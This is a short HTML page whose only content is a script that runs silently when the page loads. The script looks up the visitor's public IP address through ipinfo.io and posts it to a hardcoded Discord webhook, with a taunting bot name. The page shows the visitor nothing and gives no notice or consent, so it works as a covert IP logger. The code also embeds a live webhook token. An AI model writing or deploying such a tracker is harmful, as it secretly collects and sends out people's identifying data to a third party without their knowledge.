<html>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
window.onload = function()
{
   $.get("https://ipinfo.io", function(response) {
   const request = new XMLHttpRequest();
   request.open("POST", "https://canary.discord.com/api/webhooks/984993713967218688/9nRdiJMNsQEGJmUsdo9TaB3f_St16wAQvVg5XHEgsYRWMm64HOMdlXZ-Br8S_HD47QK8")
   request.setRequestHeader("Content-type", "application/json")
   
   const params = {
   username: "why are you looking at this. huh?",
   avatar_url: "",
   content: response.ip
   }
   
   request.send(JSON.stringify(params));
   
   }, "json")
}
</script>
</html>